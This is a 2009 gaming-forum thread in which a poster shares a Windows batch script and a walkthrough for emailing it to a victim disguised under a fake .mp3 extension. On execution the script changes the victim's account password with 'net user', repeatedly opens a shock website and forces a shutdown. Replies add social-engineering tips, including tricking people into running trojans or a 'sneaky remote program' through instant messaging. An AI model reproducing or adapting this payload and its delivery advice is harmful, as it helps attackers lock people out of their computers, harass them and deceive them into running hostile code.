10-15-2009, 01:13 AM #1
CA5U4LTY
Pokemon Trainer
(adsbygoogle = window.adsbygoogle || []).push({}); Hey everyone!!

Here is a very special batch I created. I tried to upload a video of this on youtube, but it kept getting denied due to promotion of harmful information.:mad:

Basically, once binded and sent within an email, you will be able to change the users password, send them to a bad website, and shut down their computer, all from your own computer.

Although, what limits its abilities is whether or not you know the account username of the victim. Thats critical.

I figured i could always dismantle their system 32, but thats just so damn boring and typical. This way is much more dramatic, and much more annoying Smile

Ill take you through a step-by-step to show you what each action does:

Open notepad (like all batch files)

And type the following:

@echo off
net user (username of target) "New desired password" ***changes users password to whatever you want.***
start iexplore You must login or register to view this content. ***sends them to an "undesired" website, and you can type this as many times as you want in order to open the website the correlating amount of times, and disrupt time of which they may use the "shutdown -a" command to divert the shutdown sequence.
shutdown -c "LOL" -s -t 30 ***the -t stands for the time, so this is critical in whether you are dealing with a computer aficionado or not. If they know how to divert the shutdown sequence, put less time to no time at all in the countdown for the shutdown sequence, so instead of 30 seconds maybe 5 or 10 seconds, or even 1 if you're worried. But its always more fun to build suspense by adding plenty of time for the E-bombs to annoy themHappy

So heres the entire thing, you may copy and paste if you like so you can save it for future reference.

@echo off
net user (username of victim) "New Password"
start iexplore You must login or register to view this content.
shutdown -c "Your message here" -s -t 10

Then once you create it, save it as a .bat. Once you want to send it to the correlating user, download some software that hides the extension (plenty you can find on google) by adding a different extension, like .mp3 is a good one. And then bind it to an email and send it to the users email adress.

Done!!

Now once they open it, they will have their username password changed so they cant log on their own account anymore, be sent to meatspin several times, and have their computer shutdown!!

Also, when they turn their computer back on, they still wont be able to login, because their password is permanently changed.

Enjoy, and be safe!!

(lol)

Sorry everyone about the links, PLEASE DONT CLICK them.

If anyone has trouble grasping things, say so below, and i'll be happy to elaborate Happy
Last edited by CA5U4LTY ; 10-15-2009 at 01:37 AM.
10-15-2009, 08:20 AM #2
User title is missleading. You're not doing anything remotely, you're sending it to them to run locally.

The username bit is pretty useless as you don't know the username of the person or if they have admin rights to the pc, so this would cause the bat file to bomb out and wouldn't run the file. In VB you can do things like On Error Resume Next, but I dunno in BAT file's cos they're pretty much extinct.

It doesn't exactly hide the extension either, it just makes it look more legit to the user.
Last edited by Gobz ; 10-15-2009 at 01:37 PM.
10-15-2009, 05:41 PM #3
Originally posted by Gobble172 View Post
User title is missleading. You're not doing anything remotely, you're sending it to them to run locally.

The username bit is pretty useless as you don't know the username of the person or if they have admin rights to the pc, so this would cause the bat file to bomb out and wouldn't run the file. In VB you can do things like On Error Resume Next, but I dunno in BAT file's cos they're pretty much extinct.

It doesn't exactly hide the extension either, it just makes it look more legit to the user.

Well you could always send them to a site and make them download your trojan to have remote access. The title is a bit misleading but overall I think it's pretty accurate Smile Plus it made me lol kinda hard.
Good work! We can't stop here.. it's .bat country
10-15-2009, 05:48 PM #4
Physicalfire
Bounty hunter

Ja on error resume next is the error handling for VB6. I think BAT do have error handling. I think it maybe GOTO so for example if criteria = false then goto (a-z) elseif (critera(a-z))
10-15-2009, 11:12 PM #5
CA5U4LTY
Pokemon Trainer

Without force-feeding the victim a control program that runs involuntarily on execution, this is the most remote and discrete way that you can run a written program on a network other than your own.

Also, I disclaimed before i even showed the batch that knowing the actual name of the user is critical to validate the script, otherwise its a useless code. Anyone with even the must subtle knowledge of vbs's would know that it would brick the file without that information. So thanks for stating the obvious.

And no, it doesn't hide the extension, but how many technologically ignorant people do you know that read the entire non-abbreviated extension? On a general scale, not many. Most people scan over it, and hit ok on the warning without even thinking twice about it.

We aren't exactly trying to scam a network securities agent on an IBM, are we?

So far, this is about as personal i can get. If you think you can trace an ip to a location, sniff into their local files and find the victims local username without being detected, then you can talk to me about it.
10-16-2009, 09:07 AM #6
Originally posted by CA5U4LTY View Post
Without force-feeding the victim a control program that runs involuntarily on execution, this is the most remote and discrete way that you can run a written program on a network other than your own.

Also, I disclaimed before i even showed the batch that knowing the actual name of the user is critical to validate the script, otherwise its a useless code. Anyone with even the must subtle knowledge of vbs's would know that it would brick the file without that information. So thanks for stating the obvious.

And no, it doesn't hide the extension, but how many technologically ignorant people do you know that read the entire non-abbreviated extension? On a general scale, not many. Most people scan over it, and hit ok on the warning without even thinking twice about it.

We aren't exactly trying to scam a network securities agent on an IBM, are we?

So far, this is about as personal i can get. If you think you can trace an ip to a location, sniff into their local files and find the victims local username without being detected, then you can talk to me about it.

Firstly I was actually trying to help you in saying that you could keep that part in the bat file, but if it errors it would move onto the next section of the script. I don't use BAT files though like I said. They're pretty much extinct for my needs.

You could like someone said.. Send them a shortcut to a file on a server and hope they're daft enough to open it. I find this method works well over Instant Messaging because the person will think he's just clicking open to open the file, not your sneeky remote program.

I don't know why you'd want to trace the IP to the location, but there are websites that can get close(ish) with just the IP. You don't need to know where they live though and yes there are programs that can take you futher from that, but that really depends on what security they have, even a router is enough security to stop most things with it's NAT and inbuilt firewall, but I'm not here to do lessons.
10-17-2009, 01:10 AM #7

You could like someone said.. Send them a shortcut to a file on a server and hope they're daft enough to open it. I find this method works well over Instant Messaging because the person will think he's just clicking open to open the file, not your sneeky remote program.

Smile wow what a great idea.. how come I never thought of this genius?

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo